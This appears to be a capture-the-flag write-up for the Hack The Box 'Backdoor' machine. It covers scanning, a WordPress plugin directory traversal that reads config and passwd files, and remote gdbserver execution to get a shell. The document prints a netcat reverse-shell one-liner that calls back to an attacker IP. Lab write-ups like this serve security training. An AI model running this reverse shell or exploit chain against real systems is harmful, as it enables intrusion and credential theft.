Write up: Backdoor -HTB
Nmap:
sudo nmap -sC -sV -oA nmap/backdoor 10.10.11.125
[sudo] password for arjun:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-15 04:35 EST
Nmap scan report for 10.10.11.125
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 secondsWe can see only two port is open port i.e 22 and 80.SSH is running on port 22 and port 80 is running a WordPress 5.8.1. Beside this is nothing much of importance. So let scan the all the port
Nmap 7.91 scan initiated Tue Dec 14 00:42:51 2021 as: nmap -p- -oA nmap/backdoor 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.28s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1107/tcp filtered isoipsigport-2
1337/tcp open waste
3018/tcp filtered srvc_registry
23442/tcp filtered unknown
31456/tcp filtered unknown
32504/tcp filtered unknown
35771/tcp filtered unknown
# Nmap done at Tue Dec 14 01:16:30 2021 -- 1 IP address (1 host up) scanned in 2018.88 seconds
CopyWe can see there is another ports that is open
Web:
Let’s keep the wpscan running at background while we manually poke the website
└─$ wpscan --url http://10.10.11.125 -e vp,vt,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Wed Dec 15 05:46:19 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
----- snip-------
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Dec 15 05:49:30 2021
[+] Requests Done: 411
[+] Cached Requests: 8
[+] Data Sent: 107.312 KB
[+] Data Received: 502.675 KB
[+] Memory used: 233.688 MB
[+] Elapsed time: 00:03:11We didn't get much information from the wpscan. But it found the user 'admin'
On clicking home, we were redirected to http://backdoor.htb. let’s edit our /etc/hosts file
We didn't found worth mentioning while checking the website so let's fuzz the directory using gobuster
└─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://backdoor.htb/ -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/15 06:05:39 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
/index.php (Status: 301) [Size: 0] [--> http://backdoor.htb/]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-login.php (Status: 200) [Size: 5674]
/server-status (Status: 403) [Size: 277]
/wp-config.php (Status: 200) [Size: 0]
Progress: 47972 / 60002 (79.95%) [ERROR] 2021/12/15 06:12:04 [!] parse "http://backdoor.htb/error\x1f_log": net/url
: invalid control character in URL
===============================================================
2021/12/15 06:13:38 Finished
===============================================================/wp-admin is redirected to login page
We can try default credentials and basic SQL injection but it didn’t work. In the meantime, we can start gobuster to fuzz directory at http://backdoor.htb/wp-content
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/15 06:18:01 Starting gobuster in directory enumeration mode
===============================================================
/plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
/themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
/upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
/index.php
-----------------snip-------While looking at the /plugins we found ebook-download plugin is installed.
we can see the current version of ebook-download plugin installed from the readme file
After a quick google search at the version, we can find that there is a Directory Traversal vulnerability. You can find the more info at https://www.exploit-db.com/exploits/39575
We can download file using this vulnerability. We were able to get the database credentials from wp-config.php
└─$ cat wp-config.php
---------------------snip----------------
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );\
---------------------snip----------------/etc/passwd file
└─$ cat passwd [6/416]
../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
er:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>from the /etc/passwd file we can confirm that there is another user called ‘user'. We can try dumping couple of possible files to find some important information but sadly this wasn't the case. We can try dumping for PIDs
We can use burp intruder to fuzz the PIDs
payload:
While looking at the response we find that gdbserver is running at port 1337
After googling a bit, we can find a Metasploit module which we can use to gain meterpreter shell. you can find more info GDB Server Remote Payload Execution (rapid7.com)
We’ll be skipping Metasploit here, instead we will use gdbserver to gain reverse shell
After reading the documentation about remote debugging programs using gdb. It was clear that we can get reverse shell using gdb debugging. For more information you can visitRemote Debugging (Debugging with GDB) (sourceware.org)
Let’s create a reverse shell file
└─$ cat rev.elf
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.52 1234 >/tmp/fshell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1234 >/tmp/f
Setup the ncat listener
$ nc -lnvp 1234
listening on [any] 1234 ...now run the gdb, simply running "gdb" command. If gdb is not installed, you can install using apt
command used :
- target extended-remote 10.10.11.125:1137
- remote put rev.elf rev.elf
- set remote exec-file rev.elf
- show remote exec-file
- b main
- run
Voila!, we got the shell. user flag can be found at /home/user
root
first let's swap a tty shell
After swaping tty shell , We can run the command "ps -aux" so that we can get insighted about the running proccess victim’s machine. We can quickly notice that screen have been running on the machine as "SCREEN -dmS root"
After reading on GTFOBins website, there’s a few command that we can take advantage over here. screen | GTFOBins
user@Backdoor:~$ ps -aux | grep SCREEN
ps -aux | grep SCREEN
root 960 0.0 0.1 6952 2320 ? Ss 13:58 0:00 SCREEN -dmS root
user 7490 0.0 0.0 6432 732 pts/1 S+ 14:41 0:00 grep --color=auto SCREEN
user@Backdoor:~$For those who are not familiar with Screen, it’s a terminal multiplexer which you can start a session with screen and also can open any number of virtual terminals within that session.
